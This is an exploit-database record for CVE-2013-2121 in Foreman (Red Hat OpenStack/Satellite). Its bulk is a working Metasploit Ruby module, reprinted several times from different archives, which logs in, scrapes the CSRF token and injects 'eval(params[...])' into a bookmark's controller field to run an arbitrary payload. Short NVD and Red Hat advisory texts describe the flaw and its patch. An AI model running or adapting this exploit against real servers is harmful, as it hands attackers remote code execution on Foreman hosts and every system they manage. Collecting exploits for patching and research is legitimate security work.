Foreman Red Hat OpenStack/Satellite bookmarks/create Code Injection
2013-07-23T00:00:00
ID EDB-ID:27045 Type exploitdb Reporter metasploit Modified 2013-07-23T00:00:00
Description
Foreman (Red Hat OpenStack/Satellite) bookmarks/create Code Injection. CVE-2013-2121. Remote exploit for linux platform
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit4 < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpClient
def initialize
super(
'Name' => 'Foreman (Red Hat OpenStack/Satellite) bookmarks/create Code Injection',
'Description' => %q{
This module exploits a code injection vulnerability in the 'create'
action of 'bookmarks' controller of Foreman and Red Hat OpenStack/Satellite
(Foreman 1.2.0-RC1 and earlier).
},
'Author' => 'Ramon de C Valle',
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2013-2121'],
['CWE', '95'],
['OSVDB', '94671'],
['BID', '60833'],
['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=968166'],
['URL', 'http://projects.theforeman.org/issues/2631']
],
'Platform' => 'ruby',
'Arch' => ARCH_RUBY,
'Privileged' => false,
'Targets' =>
[
['Automatic', {}]
],
'DisclosureDate' => 'Jun 6 2013',
'DefaultOptions' => { 'PrependFork' => true },
'DefaultTarget' => 0
)
register_options(
[
Opt::RPORT(443),
OptBool.new('SSL', [true, 'Use SSL', true]),
OptString.new('USERNAME', [true, 'Your username', 'admin']),
OptString.new('PASSWORD', [true, 'Your password', 'changeme']),
OptString.new('TARGETURI', [ true, 'The path to the application', '/']),
], self.class
)
end
def exploit
print_status("Logging into #{target_url}...")
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'users', 'login'),
'vars_post' => {
'login[login]' => datastore['USERNAME'],
'login[password]' => datastore['PASSWORD']
}
)
fail_with(Exploit::Failure::Unknown, 'No response from remote host') if res.nil?
if res.headers['Location'] =~ /users\/login$/
fail_with(Exploit::Failure::NoAccess, 'Authentication failed')
else
session = $1 if res.headers['Set-Cookie'] =~ /_session_id=([0-9a-f]*)/
fail_with(Exploit::Failure::UnexpectedReply, 'Failed to retrieve the current session id') if session.nil?
end
print_status('Retrieving the CSRF token for this session...')
res = send_request_cgi(
'cookie' => "_session_id=#{session}",
'method' => 'GET',
'uri' => normalize_uri(target_uri)
)
fail_with(Exploit::Failure::Unknown, 'No response from remote host') if res.nil?
if res.headers['Location'] =~ /users\/login$/
fail_with(Exploit::Failure::UnexpectedReply, 'Failed to retrieve the CSRF token')
else
csrf_param = $1 if res.body =~ /<meta[ ]+content="(.*)"[ ]+name="csrf-param"[ ]*\/?>/i
csrf_token = $1 if res.body =~ /<meta[ ]+content="(.*)"[ ]+name="csrf-token"[ ]*\/?>/i
if csrf_param.nil? || csrf_token.nil?
csrf_param = $1 if res.body =~ /<meta[ ]+name="csrf-param"[ ]+content="(.*)"[ ]*\/?>/i
csrf_token = $1 if res.body =~ /<meta[ ]+name="csrf-token"[ ]+content="(.*)"[ ]*\/?>/i
end
fail_with(Exploit::Failure::UnexpectedReply, 'Failed to retrieve the CSRF token') if csrf_param.nil? || csrf_token.nil?
end
payload_param = Rex::Text.rand_text_alpha_lower(rand(9) + 3)
print_status("Sending create-bookmark request to #{target_url('bookmarks')}...")
res = send_request_cgi(
'cookie' => "_session_id=#{session}",
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'bookmarks'),
'vars_post' => {
csrf_param => csrf_token,
payload_param => payload.encoded,
'bookmark[controller]' => "eval(params[:#{payload_param}])#",
'bookmark[name]' => Rex::Text.rand_text_alpha_lower(rand(9) + 3),
'bookmark[query]' => Rex::Text.rand_text_alpha_lower(rand(9) + 3)
}
)
end
def target_url(*args)
(ssl ? 'https' : 'http') +
if rport.to_i == 80 || rport.to_i == 443
"://#{vhost}"
else
"://#{vhost}:#{rport}"
end + normalize_uri(target_uri.path, *args)
end
end
{"id": "EDB-ID:27045", "hash": "f0ddba49362313bbc4f88c086facef4b", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Foreman Red Hat OpenStack/Satellite bookmarks/create Code Injection", "description": "Foreman (Red Hat OpenStack/Satellite) bookmarks/create Code Injection. CVE-2013-2121. Remote exploit for linux platform", "published": "2013-07-23T00:00:00", "modified": "2013-07-23T00:00:00", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/27045/", "reporter": "metasploit", "references": [], "cvelist": ["CVE-2013-2121"], "lastseen": "2016-02-03T04:59:40", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 5.3, "vector": "NONE", "modified": "2016-02-03T04:59:40"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-2121"]}, {"type": "zdt", "idList": ["1337DAY-ID-21021"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:122510"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/LINUX/HTTP/FOREMAN_OPENSTACK_SATELLITE_CODE_EXEC"]}, {"type": "redhat", "idList": ["RHSA-2013:0995"]}], "modified": "2016-02-03T04:59:40"}, "vulnersScore": 5.3}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/27045/", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit4 < Msf::Exploit::Remote\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize\r\n super(\r\n 'Name' => 'Foreman (Red Hat OpenStack/Satellite) bookmarks/create Code Injection',\r\n 'Description' => %q{\r\n This module exploits a code injection vulnerability in the 'create'\r\n action of 'bookmarks' controller of Foreman and Red Hat OpenStack/Satellite\r\n (Foreman 1.2.0-RC1 and earlier).\r\n },\r\n 'Author' => 'Ramon de C Valle',\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n ['CVE', '2013-2121'],\r\n ['CWE', '95'],\r\n ['OSVDB', '94671'],\r\n ['BID', '60833'],\r\n ['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=968166'],\r\n ['URL', 'http://projects.theforeman.org/issues/2631']\r\n ],\r\n 'Platform' => 'ruby',\r\n 'Arch' => ARCH_RUBY,\r\n 'Privileged' => false,\r\n 'Targets' =>\r\n [\r\n ['Automatic', {}]\r\n ],\r\n 'DisclosureDate' => 'Jun 6 2013',\r\n 'DefaultOptions' => { 'PrependFork' => true },\r\n 'DefaultTarget' => 0\r\n )\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(443),\r\n OptBool.new('SSL', [true, 'Use SSL', true]),\r\n OptString.new('USERNAME', [true, 'Your username', 'admin']),\r\n OptString.new('PASSWORD', [true, 'Your password', 'changeme']),\r\n OptString.new('TARGETURI', [ true, 'The path to the application', '/']),\r\n ], self.class\r\n )\r\n end\r\n\r\n def exploit\r\n print_status(\"Logging into #{target_url}...\")\r\n res = send_request_cgi(\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path, 'users', 'login'),\r\n 'vars_post' => {\r\n 'login[login]' => datastore['USERNAME'],\r\n 'login[password]' => datastore['PASSWORD']\r\n }\r\n )\r\n\r\n fail_with(Exploit::Failure::Unknown, 'No response from remote host') if res.nil?\r\n\r\n if res.headers['Location'] =~ /users\\/login$/\r\n fail_with(Exploit::Failure::NoAccess, 'Authentication failed')\r\n else\r\n session = $1 if res.headers['Set-Cookie'] =~ /_session_id=([0-9a-f]*)/\r\n fail_with(Exploit::Failure::UnexpectedReply, 'Failed to retrieve the current session id') if session.nil?\r\n end\r\n\r\n print_status('Retrieving the CSRF token for this session...')\r\n res = send_request_cgi(\r\n 'cookie' => \"_session_id=#{session}\",\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri)\r\n )\r\n\r\n fail_with(Exploit::Failure::Unknown, 'No response from remote host') if res.nil?\r\n\r\n if res.headers['Location'] =~ /users\\/login$/\r\n fail_with(Exploit::Failure::UnexpectedReply, 'Failed to retrieve the CSRF token')\r\n else\r\n csrf_param = $1 if res.body =~ /<meta[ ]+content=\"(.*)\"[ ]+name=\"csrf-param\"[ ]*\\/?>/i\r\n csrf_token = $1 if res.body =~ /<meta[ ]+content=\"(.*)\"[ ]+name=\"csrf-token\"[ ]*\\/?>/i\r\n\r\n if csrf_param.nil? || csrf_token.nil?\r\n csrf_param = $1 if res.body =~ /<meta[ ]+name=\"csrf-param\"[ ]+content=\"(.*)\"[ ]*\\/?>/i\r\n csrf_token = $1 if res.body =~ /<meta[ ]+name=\"csrf-token\"[ ]+content=\"(.*)\"[ ]*\\/?>/i\r\n end\r\n\r\n fail_with(Exploit::Failure::UnexpectedReply, 'Failed to retrieve the CSRF token') if csrf_param.nil? || csrf_token.nil?\r\n end\r\n\r\n payload_param = Rex::Text.rand_text_alpha_lower(rand(9) + 3)\r\n\r\n print_status(\"Sending create-bookmark request to #{target_url('bookmarks')}...\")\r\n res = send_request_cgi(\r\n 'cookie' => \"_session_id=#{session}\",\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path, 'bookmarks'),\r\n 'vars_post' => {\r\n csrf_param => csrf_token,\r\n payload_param => payload.encoded,\r\n 'bookmark[controller]' => \"eval(params[:#{payload_param}])#\",\r\n 'bookmark[name]' => Rex::Text.rand_text_alpha_lower(rand(9) + 3),\r\n 'bookmark[query]' => Rex::Text.rand_text_alpha_lower(rand(9) + 3)\r\n }\r\n )\r\n end\r\n\r\n def target_url(*args)\r\n (ssl ? 'https' : 'http') +\r\n if rport.to_i == 80 || rport.to_i == 443\r\n \"://#{vhost}\"\r\n else\r\n \"://#{vhost}:#{rport}\"\r\n end + normalize_uri(target_uri.path, *args)\r\n end\r\nend", "osvdbidlist": ["94671"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2019-05-29T18:13:02", "bulletinFamily": "NVD", "description": "Eval injection vulnerability in the create method in the Bookmarks controller in Foreman before 1.2.0-RC2 allows remote authenticated users with permissions to create bookmarks to execute arbitrary code via a controller name attribute.", "modified": "2018-08-13T21:47:00", "id": "CVE-2013-2121", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2121", "published": "2013-07-31T13:20:00", "title": "CVE-2013-2121", "type": "cve", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2018-03-20T00:11:05", "bulletinFamily": "exploit", "description": "This Metasploit module exploits a code injection vulnerability in the 'create' action of 'bookmarks' controller of Foreman and Red Hat OpenStack/Satellite (Foreman 1.2.0-RC1 and earlier).", "modified": "2013-07-23T00:00:00", "published": "2013-07-23T00:00:00", "id": "1337DAY-ID-21021", "href": "https://0day.today/exploit/description/21021", "type": "zdt", "title": "Foreman (Red Hat OpenStack/Satellite) Code Injection Vulnerability", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit4 < Msf::Exploit::Remote\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize\r\n super(\r\n 'Name' => 'Foreman (Red Hat OpenStack/Satellite) bookmarks/create Code Injection',\r\n 'Description' => %q{\r\n This module exploits a code injection vulnerability in the 'create'\r\n action of 'bookmarks' controller of Foreman and Red Hat OpenStack/Satellite\r\n (Foreman 1.2.0-RC1 and earlier).\r\n },\r\n 'Author' => 'Ramon de C Valle',\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n ['CVE', '2013-2121'],\r\n ['CWE', '95'],\r\n ['OSVDB', '94671'],\r\n ['BID', '60833'],\r\n ['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=968166'],\r\n ['URL', 'http://projects.theforeman.org/issues/2631']\r\n ],\r\n 'Platform' => 'ruby',\r\n 'Arch' => ARCH_RUBY,\r\n 'Privileged' => false,\r\n 'Targets' =>\r\n [\r\n ['Automatic', {}]\r\n ],\r\n 'DisclosureDate' => 'Jun 6 2013',\r\n 'DefaultOptions' => { 'PrependFork' => true },\r\n 'DefaultTarget' => 0\r\n )\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(443),\r\n OptBool.new('SSL', [true, 'Use SSL', true]),\r\n OptString.new('USERNAME', [true, 'Your username', 'admin']),\r\n OptString.new('PASSWORD', [true, 'Your password', 'changeme']),\r\n OptString.new('TARGETURI', [ true, 'The path to the application', '/']),\r\n ], self.class\r\n )\r\n end\r\n\r\n def exploit\r\n print_status(\"Logging into #{target_url}...\")\r\n res = send_request_cgi(\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path, 'users', 'login'),\r\n 'vars_post' => {\r\n 'login[login]' => datastore['USERNAME'],\r\n 'login[password]' => datastore['PASSWORD']\r\n }\r\n )\r\n\r\n fail_with(Exploit::Failure::Unknown, 'No response from remote host') if res.nil?\r\n\r\n if res.headers['Location'] =~ /users\\/login$/\r\n fail_with(Exploit::Failure::NoAccess, 'Authentication failed')\r\n else\r\n session = $1 if res.headers['Set-Cookie'] =~ /_session_id=([0-9a-f]*)/\r\n fail_with(Exploit::Failure::UnexpectedReply, 'Failed to retrieve the current session id') if session.nil?\r\n end\r\n\r\n print_status('Retrieving the CSRF token for this session...')\r\n res = send_request_cgi(\r\n 'cookie' => \"_session_id=#{session}\",\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri)\r\n )\r\n\r\n fail_with(Exploit::Failure::Unknown, 'No response from remote host') if res.nil?\r\n\r\n if res.headers['Location'] =~ /users\\/login$/\r\n fail_with(Exploit::Failure::UnexpectedReply, 'Failed to retrieve the CSRF token')\r\n else\r\n csrf_param = $1 if res.body =~ /<meta[ ]+content=\"(.*)\"[ ]+name=\"csrf-param\"[ ]*\\/?>/i\r\n csrf_token = $1 if res.body =~ /<meta[ ]+content=\"(.*)\"[ ]+name=\"csrf-token\"[ ]*\\/?>/i\r\n\r\n if csrf_param.nil? || csrf_token.nil?\r\n csrf_param = $1 if res.body =~ /<meta[ ]+name=\"csrf-param\"[ ]+content=\"(.*)\"[ ]*\\/?>/i\r\n csrf_token = $1 if res.body =~ /<meta[ ]+name=\"csrf-token\"[ ]+content=\"(.*)\"[ ]*\\/?>/i\r\n end\r\n\r\n fail_with(Exploit::Failure::UnexpectedReply, 'Failed to retrieve the CSRF token') if csrf_param.nil? || csrf_token.nil?\r\n end\r\n\r\n payload_param = Rex::Text.rand_text_alpha_lower(rand(9) + 3)\r\n\r\n print_status(\"Sending create-bookmark request to #{target_url('bookmarks')}...\")\r\n res = send_request_cgi(\r\n 'cookie' => \"_session_id=#{session}\",\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path, 'bookmarks'),\r\n 'vars_post' => {\r\n csrf_param => csrf_token,\r\n payload_param => payload.encoded,\r\n 'bookmark[controller]' => \"eval(params[:#{payload_param}])#\",\r\n 'bookmark[name]' => Rex::Text.rand_text_alpha_lower(rand(9) + 3),\r\n 'bookmark[query]' => Rex::Text.rand_text_alpha_lower(rand(9) + 3)\r\n }\r\n )\r\n end\r\n\r\n def target_url(*args)\r\n (ssl ? 'https' : 'http') +\r\n if rport.to_i == 80 || rport.to_i == 443\r\n \"://#{vhost}\"\r\n else\r\n \"://#{vhost}:#{rport}\"\r\n end + normalize_uri(target_uri.path, *args)\r\n end\r\nend\n\n# 0day.today [2018-03-19] #", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/21021"}], "packetstorm": [{"lastseen": "2016-12-05T22:18:12", "bulletinFamily": "exploit", "description": "", "modified": "2013-07-23T00:00:00", "published": "2013-07-23T00:00:00", "href": "https://packetstormsecurity.com/files/122510/Foreman-Red-Hat-OpenStack-Satellite-Code-Injection.html", "id": "PACKETSTORM:122510", "title": "Foreman (Red Hat OpenStack/Satellite) Code Injection", "type": "packetstorm", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# web site for more information on licensing and terms of use. \n# http://metasploit.com/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit4 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize \nsuper( \n'Name' => 'Foreman (Red Hat OpenStack/Satellite) bookmarks/create Code Injection', \n'Description' => %q{ \nThis module exploits a code injection vulnerability in the 'create' \naction of 'bookmarks' controller of Foreman and Red Hat OpenStack/Satellite \n(Foreman 1.2.0-RC1 and earlier). \n}, \n'Author' => 'Ramon de C Valle', \n'License' => MSF_LICENSE, \n'References' => \n[ \n['CVE', '2013-2121'], \n['CWE', '95'], \n['OSVDB', '94671'], \n['BID', '60833'], \n['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=968166'], \n['URL', 'http://projects.theforeman.org/issues/2631'] \n], \n'Platform' => 'ruby', \n'Arch' => ARCH_RUBY, \n'Privileged' => false, \n'Targets' => \n[ \n['Automatic', {}] \n], \n'DisclosureDate' => 'Jun 6 2013', \n'DefaultOptions' => { 'PrependFork' => true }, \n'DefaultTarget' => 0 \n) \n \nregister_options( \n[ \nOpt::RPORT(443), \nOptBool.new('SSL', [true, 'Use SSL', true]), \nOptString.new('USERNAME', [true, 'Your username', 'admin']), \nOptString.new('PASSWORD', [true, 'Your password', 'changeme']), \nOptString.new('TARGETURI', [ true, 'The path to the application', '/']), \n], self.class \n) \nend \n \ndef exploit \nprint_status(\"Logging into #{target_url}...\") \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, 'users', 'login'), \n'vars_post' => { \n'login[login]' => datastore['USERNAME'], \n'login[password]' => datastore['PASSWORD'] \n} \n) \n \nfail_with(Exploit::Failure::Unknown, 'No response from remote host') if res.nil? \n \nif res.headers['Location'] =~ /users\\/login$/ \nfail_with(Exploit::Failure::NoAccess, 'Authentication failed') \nelse \nsession = $1 if res.headers['Set-Cookie'] =~ /_session_id=([0-9a-f]*)/ \nfail_with(Exploit::Failure::UnexpectedReply, 'Failed to retrieve the current session id') if session.nil? \nend \n \nprint_status('Retrieving the CSRF token for this session...') \nres = send_request_cgi( \n'cookie' => \"_session_id=#{session}\", \n'method' => 'GET', \n'uri' => normalize_uri(target_uri) \n) \n \nfail_with(Exploit::Failure::Unknown, 'No response from remote host') if res.nil? \n \nif res.headers['Location'] =~ /users\\/login$/ \nfail_with(Exploit::Failure::UnexpectedReply, 'Failed to retrieve the CSRF token') \nelse \ncsrf_param = $1 if res.body =~ /<meta[ ]+content=\"(.*)\"[ ]+name=\"csrf-param\"[ ]*\\/?>/i \ncsrf_token = $1 if res.body =~ /<meta[ ]+content=\"(.*)\"[ ]+name=\"csrf-token\"[ ]*\\/?>/i \n \nif csrf_param.nil? || csrf_token.nil? \ncsrf_param = $1 if res.body =~ /<meta[ ]+name=\"csrf-param\"[ ]+content=\"(.*)\"[ ]*\\/?>/i \ncsrf_token = $1 if res.body =~ /<meta[ ]+name=\"csrf-token\"[ ]+content=\"(.*)\"[ ]*\\/?>/i \nend \n \nfail_with(Exploit::Failure::UnexpectedReply, 'Failed to retrieve the CSRF token') if csrf_param.nil? || csrf_token.nil? \nend \n \npayload_param = Rex::Text.rand_text_alpha_lower(rand(9) + 3) \n \nprint_status(\"Sending create-bookmark request to #{target_url('bookmarks')}...\") \nres = send_request_cgi( \n'cookie' => \"_session_id=#{session}\", \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, 'bookmarks'), \n'vars_post' => { \ncsrf_param => csrf_token, \npayload_param => payload.encoded, \n'bookmark[controller]' => \"eval(params[:#{payload_param}])#\", \n'bookmark[name]' => Rex::Text.rand_text_alpha_lower(rand(9) + 3), \n'bookmark[query]' => Rex::Text.rand_text_alpha_lower(rand(9) + 3) \n} \n) \nend \n \ndef target_url(*args) \n(ssl ? 'https' : 'http') + \nif rport.to_i == 80 || rport.to_i == 443 \n\"://#{vhost}\" \nelse \n\"://#{vhost}:#{rport}\" \nend + normalize_uri(target_uri.path, *args) \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/122510/foreman_openstack_satellite_code_exec.rb.txt", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "metasploit": [{"lastseen": "2019-12-07T15:26:35", "bulletinFamily": "exploit", "description": "This module exploits a code injection vulnerability in the 'create' action of 'bookmarks' controller of Foreman and Red Hat OpenStack/Satellite (Foreman 1.2.0-RC1 and earlier).\n", "modified": "2017-07-24T13:26:21", "published": "2013-07-16T15:07:31", "id": "MSF:EXPLOIT/LINUX/HTTP/FOREMAN_OPENSTACK_SATELLITE_CODE_EXEC", "href": "", "type": "metasploit", "title": "Foreman (Red Hat OpenStack/Satellite) bookmarks/create Code Injection", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize\n super(\n 'Name' => 'Foreman (Red Hat OpenStack/Satellite) bookmarks/create Code Injection',\n 'Description' => %q{\n This module exploits a code injection vulnerability in the 'create'\n action of 'bookmarks' controller of Foreman and Red Hat OpenStack/Satellite\n (Foreman 1.2.0-RC1 and earlier).\n },\n 'Author' => 'Ramon de C Valle',\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2013-2121'],\n ['CWE', '95'],\n ['OSVDB', '94671'],\n ['BID', '60833'],\n ['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=968166'],\n ['URL', 'http://projects.theforeman.org/issues/2631']\n ],\n 'Platform' => 'ruby',\n 'Arch' => ARCH_RUBY,\n 'Privileged' => false,\n 'Targets' =>\n [\n ['Automatic', {}]\n ],\n 'DisclosureDate' => 'Jun 6 2013',\n 'DefaultOptions' => { 'PrependFork' => true },\n 'DefaultTarget' => 0\n )\n\n register_options(\n [\n Opt::RPORT(443),\n OptBool.new('SSL', [true, 'Use SSL', true]),\n OptString.new('USERNAME', [true, 'Your username', 'admin']),\n OptString.new('PASSWORD', [true, 'Your password', 'changeme']),\n OptString.new('TARGETURI', [ true, 'The path to the application', '/']),\n ], self.class\n )\n end\n\n def exploit\n print_status(\"Logging into #{target_url}...\")\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'users', 'login'),\n 'vars_post' => {\n 'login[login]' => datastore['USERNAME'],\n 'login[password]' => datastore['PASSWORD']\n }\n )\n\n fail_with(Failure::Unknown, 'No response from remote host') if res.nil?\n\n if res.headers['Location'] =~ /users\\/login$/\n fail_with(Failure::NoAccess, 'Authentication failed')\n else\n session = $1 if res.get_cookies =~ /_session_id=([0-9a-f]*)/\n fail_with(Failure::UnexpectedReply, 'Failed to retrieve the current session id') if session.nil?\n end\n\n print_status('Retrieving the CSRF token for this session...')\n res = send_request_cgi(\n 'cookie' => \"_session_id=#{session}\",\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri)\n )\n\n fail_with(Failure::Unknown, 'No response from remote host') if res.nil?\n\n if res.headers['Location'] =~ /users\\/login$/\n fail_with(Failure::UnexpectedReply, 'Failed to retrieve the CSRF token')\n else\n csrf_param = $1 if res.body =~ /<meta[ ]+content=\"(.*)\"[ ]+name=\"csrf-param\"[ ]*\\/?>/i\n csrf_token = $1 if res.body =~ /<meta[ ]+content=\"(.*)\"[ ]+name=\"csrf-token\"[ ]*\\/?>/i\n\n if csrf_param.nil? || csrf_token.nil?\n csrf_param = $1 if res.body =~ /<meta[ ]+name=\"csrf-param\"[ ]+content=\"(.*)\"[ ]*\\/?>/i\n csrf_token = $1 if res.body =~ /<meta[ ]+name=\"csrf-token\"[ ]+content=\"(.*)\"[ ]*\\/?>/i\n end\n\n fail_with(Failure::UnexpectedReply, 'Failed to retrieve the CSRF token') if csrf_param.nil? || csrf_token.nil?\n end\n\n payload_param = Rex::Text.rand_text_alpha_lower(rand(9) + 3)\n\n print_status(\"Sending create-bookmark request to #{target_url('bookmarks')}...\")\n res = send_request_cgi(\n 'cookie' => \"_session_id=#{session}\",\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'bookmarks'),\n 'vars_post' => {\n csrf_param => csrf_token,\n payload_param => payload.encoded,\n 'bookmark[controller]' => \"eval(params[:#{payload_param}])#\",\n 'bookmark[name]' => Rex::Text.rand_text_alpha_lower(rand(9) + 3),\n 'bookmark[query]' => Rex::Text.rand_text_alpha_lower(rand(9) + 3)\n }\n )\n end\n\n def target_url(*args)\n (ssl ? 'https' : 'http') +\n if rport.to_i == 80 || rport.to_i == 443\n \"://#{vhost}\"\n else\n \"://#{vhost}:#{rport}\"\n end + normalize_uri(target_uri.path, *args)\n end\nend\n", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/foreman_openstack_satellite_code_exec.rb"}], "redhat": [{"lastseen": "2019-08-13T18:45:59", "bulletinFamily": "unix", "description": "The Foreman packages provide facilities for rapidly deploying Red Hat\nOpenStack 3.0 (\"Grizzly\") Preview. These packages are provided as a\nTechnology Preview. For more information on the scope and nature of support\nfor items marked as Technology Preview, refer to\nhttps://access.redhat.com/support/offerings/techpreview/\n\nA flaw was found in the create method of the Foreman Bookmarks controller.\nA user with privileges to create a bookmark could use this flaw to execute\narbitrary code with the privileges of the user running Foreman, giving them\ncontrol of the system running Foreman (such as installing new packages) and\nall systems managed by Foreman. (CVE-2013-2121)\n\nA flaw was found in the way the Foreman UsersController controller handled\nuser creation. A non-admin user with privileges to create non-admin\naccounts could use this flaw to create admin accounts, giving them control\nof the system running Foreman (such as installing new packages) and all\nsystems managed by Foreman. (CVE-2013-2113)\n\nThese issues were discovered by Ramon de C Valle of the Red Hat Product\nSecurity Team.\n\nThis update also fixes the following bugs:\n\n* The cron job for Puppet had an incorrect path when installed via the\nForeman installer. (BZ#969531)\n\n* This update removes provisioning templates and installation media for\nunsupported client operating systems. (BZ#971545)\n\n* Previously, the init script for Foreman was installed in the /opt/\ndirectory, resulting in errors when attempting to use the \"service\"\ncommand to control Foreman, and errors when installing or upgrading the\nForeman packages. As the Foreman service is not needed for Red Hat\nOpenStack, this update removes the init script. (BZ#972755)\n\n* Previously, after using Foreman to install controller and compute nodes,\nit was not possible to launch compute instances. (BZ#972780)\n\n* Previously, Foreman compiled assets for an incorrect path. The assets\nwere configured for \"[fully qualified domain name]/foreman\", which is not\nwhere Foreman is served from in Red Hat OpenStack. (BZ#975068)\n\n* Previously, the Foreman installer used a reference to an OpenStack\nhost's network interface instead of its own secondary interface when\ncreating a subnet, which could cause subnet creation to fail and a \"rake\naborted!\" message to be displayed. (BZ#976907)\n\nUsers of Foreman are advised to upgrade to these updated packages, which\ncorrect these issues. In Red Hat OpenStack, Foreman runs on the Apache HTTP\nServer using mod_passenger. As such, after installing the updated packages,\nthe httpd service must be restarted (\"service httpd restart\") for this\nupdate to take effect.\n", "modified": "2018-06-13T01:27:37", "published": "2013-06-27T04:00:00", "id": "RHSA-2013:0995", "href": "https://access.redhat.com/errata/RHSA-2013:0995", "type": "redhat", "title": "(RHSA-2013:0995) Important: Foreman security and bug fix update", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}]}